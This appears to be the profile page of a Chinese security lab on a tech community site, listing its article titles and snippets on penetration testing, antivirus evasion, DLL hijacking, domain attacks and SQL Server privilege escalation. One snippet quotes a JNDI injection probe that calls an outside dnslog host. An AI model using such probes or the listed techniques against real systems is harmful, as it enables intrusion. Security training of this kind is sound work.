Ms08067安全实验室

文章/答案/技术大牛

发布

LV0

发表了文章 2025-03-212025-03-21 14:47:44

渗透测试流程到底是什么？这篇给你讲清楚(超详细)

通常来说，我们会先使用类似于AWVS 、Appscan等工具进⾏主动扫描；主动扫描这个过程主要旨在使用自动化工具解放双手发现漏洞。

Ms08067安全实验室 2025-03-212025-03-21 14:47:44

渗透测试、代理、代理服务器、漏洞、配置

发表了文章 2025-03-142025-03-14 10:57:39

0Day挖掘浅析

对于Web类的漏洞挖掘（包含逻辑类型），有什么更好的挖掘思路?（发现非历史漏洞的新漏洞点，偏0day挖掘方向）

Ms08067安全实验室 2025-03-142025-03-14 10:57:39

自动化、工具、函数、漏洞、配置

发表了文章 2025-03-102025-03-10 10:42:16

从甲方角度看如何挖SRC

因此，通常来说，针对于互联⽹企业（称为" 甲⽅ "）对应都拥有各⼤SRC平台；在对应的甲⽅企业内，会有对应的《安全运营体系建设》、《安全开发体系规范（代码安...

Ms08067安全实验室 2025-03-102025-03-10 10:42:16

测试、开发、漏洞、安全、src

发表了文章 2025-03-072025-03-07 08:17:32

人脸识别9种攻击方式

攻击者准备被攻击者的一段真人视频，或经过图像处理获得合成视频，展示在显示屏上（高清手机屏、retina高清、iPad屏、4K屏等）使用活体app进行拍摄。

Ms08067安全实验室 2025-03-072025-03-07 08:17:32

视频、手机、人脸识别、脚本、进程

发表了文章 2025-03-032025-03-03 12:38:24

利用DLL Proxying技术隐匿执行恶意代码

我们通过DLL 侧载可以实现隐匿执行恶意代码，但存在一个问题，那就是需要去找到被劫持的DLL文件的导出函数以及确定哪个导出函数在DLL 被加载时会被执行。这个问...

Ms08067安全实验室 2025-03-032025-03-03 12:38:24

dll、操作系统、代理、函数、进程

发表了文章 2025-02-272025-02-27 11:18:30

实战寻找Windows可执行文件运行证据

在Windows系统上可以找到的许多证据，可以重建时间线，展示谁在何时何地运行了哪些应用程序以及如何从中提取有意义的数据。内存取证不在这里的讨论范围，我们主要关...

Ms08067安全实验室 2025-02-272025-02-27 11:18:31

数据库、存储、windows、工具、数据

发表了文章 2025-01-172025-01-17 19:47:25

世界上运行时间最长的服务器是多久？

最近，在知乎上看到一个引人深思的问题：“世界上连续运行时间最长的电脑（服务器）是多久？”该话题引发激烈的讨论，一时间众说纷纭。

Ms08067安全实验室 2025-01-172025-01-17 19:47:26

服务器、计算机、系统、数据库、运维

发表了文章 2024-12-202024-12-20 19:18:20

学员投稿 | go语言免杀360

先从exe出发先写一个正常的输出hello,world exe 用工具 CheckGoBuild.exe -f main.go 批量编译一下

Ms08067安全实验室 2024-12-202024-12-20 19:18:21

指针、byte、函数、加密、内存

发表了文章 2024-12-192024-12-19 15:14:51

【揭秘三】练武靶场

Apache JMeter是美国阿帕奇（Apache）软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反...

Ms08067安全实验室 2024-12-192024-12-19 15:14:51

日志、系统、工具、开发者、漏洞

发表了文章 2024-12-192024-12-19 15:11:57

【揭秘二】练武靶场

一、couchdb 1.简介： Apache CouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式， ...

Ms08067安全实验室 2024-12-192024-12-19 15:11:57

数据库、session、编码、漏洞、配置

发表了文章 2024-11-262024-11-26 08:46:06

【揭秘一】练武靶场

尝试JNDI注入时, 语句为：${jndi:dns://teg756.dnslog.cn}

Ms08067安全实验室 2024-11-262024-11-26 08:46:39

服务器、工具、漏洞、序列化、测试

发表了文章 2024-07-202024-07-20 12:18:40

一篇文章搞懂跨森林攻击

森林信任和域信任有相似之处，但也有不同之处。下图为ms08067.cn和ms08067.hk之间的信任：

Ms08067安全实验室 2024-07-202024-07-20 12:18:41

权限、搜索、get、对象、配置

发表了文章 2024-07-202024-07-20 12:16:27

银行窃密木马综合分析报告

燥热的夏天，最近一段时间三四个金融客户都中了一个同一种木马病毒，MS08067安全团队对此事进行了相关跟进，获取到了相应的样本，并对其一个最新的变种样本进行了详...

Ms08067安全实验室 2024-07-202024-07-20 12:16:28

金融、byte、int、函数、字符串

发表了文章 2024-07-082024-07-08 14:30:49

实战某大型连锁企业域渗透

对黑客来说，拿下域控制器是终极目标。然而攻击者空间是如何通过采取信息收集、权限提升、横向移动等一系列手段，从而一步步拿下域控制器的呢？本次将从一张拓扑图开始，和...

Ms08067安全实验室 2024-07-082024-07-08 14:30:49

企业、登录、计算机、权限、域名

发表了文章 2024-07-082024-07-08 14:29:43

DLL劫持技术权限提升及防范

DLL(Dynamic Link Library)文件为动态链接库文件，又称“应用程序拓展”，是一种文件类型。在程序运行中，可能会需要一些相对独立的动态链接库，...

Ms08067安全实验室 2024-07-082024-07-08 14:29:43

程序、漏洞、权限、dll、测试

发表了文章 2024-06-262024-06-26 09:40:44

利用Linked SQL Server提权

Linked SQL server是一个SQL Server数据库中的对象，它可以连接到另一个SQL Server或非SQL Server数据源（如Oracle...

Ms08067安全实验室 2024-06-262024-06-26 09:40:45

服务器、配置、数据库、sql、server

发表了文章 2024-06-252024-06-25 15:21:04

利用MSSQL模拟提权

在MS SQL数据库，可以使用EXECUTE AS语句，以其他用户的上下文执行SQL查询。需要注意的是只有明确授予模拟（Impersonate）权限的用户才能执...

Ms08067安全实验室 2024-06-252024-06-25 15:21:05

数据库、测试、存储过程、服务器、权限

发表了文章 2024-06-132024-06-13 18:17:00

内网Hash转发攻击

如果我们捕获到NTLM hash的域用户是某台远程主机的本地管理员，我们则可以执行pass-the hash攻击来获得远程代码执行。虽然Net-NTLM has...

Ms08067安全实验室 2024-06-132024-06-13 18:17:00

hash、编码、服务、终端、主机

发表了文章 2024-05-312024-05-31 20:13:00

SQL Server数据库UNC路径注入攻击

如果我们能强制SQL服务器连接到我们控制的SMB共享，连接将会包含认证数据。更具体的来说，将会发起一个NTLM认证，我们将能捕获到运行SQL服务的账户的密码ha...

Ms08067安全实验室 2024-05-312024-05-31 20:13:00

服务、数据库、sql、server、存储过程

发表了文章 2024-05-202024-05-20 14:00:36

个人简介

Ms08067安全实验室
团队已出版《Web安全攻防：渗透测试实战指南》《内网安全攻防：渗透测试实战指南》等书籍。
暂未填写技能专长
北京交通大学
http://www.ms08067.com
北京
加入社区时间：2019-09-23

个人成就

获得 812 次赞同
文章被阅读 495.7K 次

关注了：1关注者：108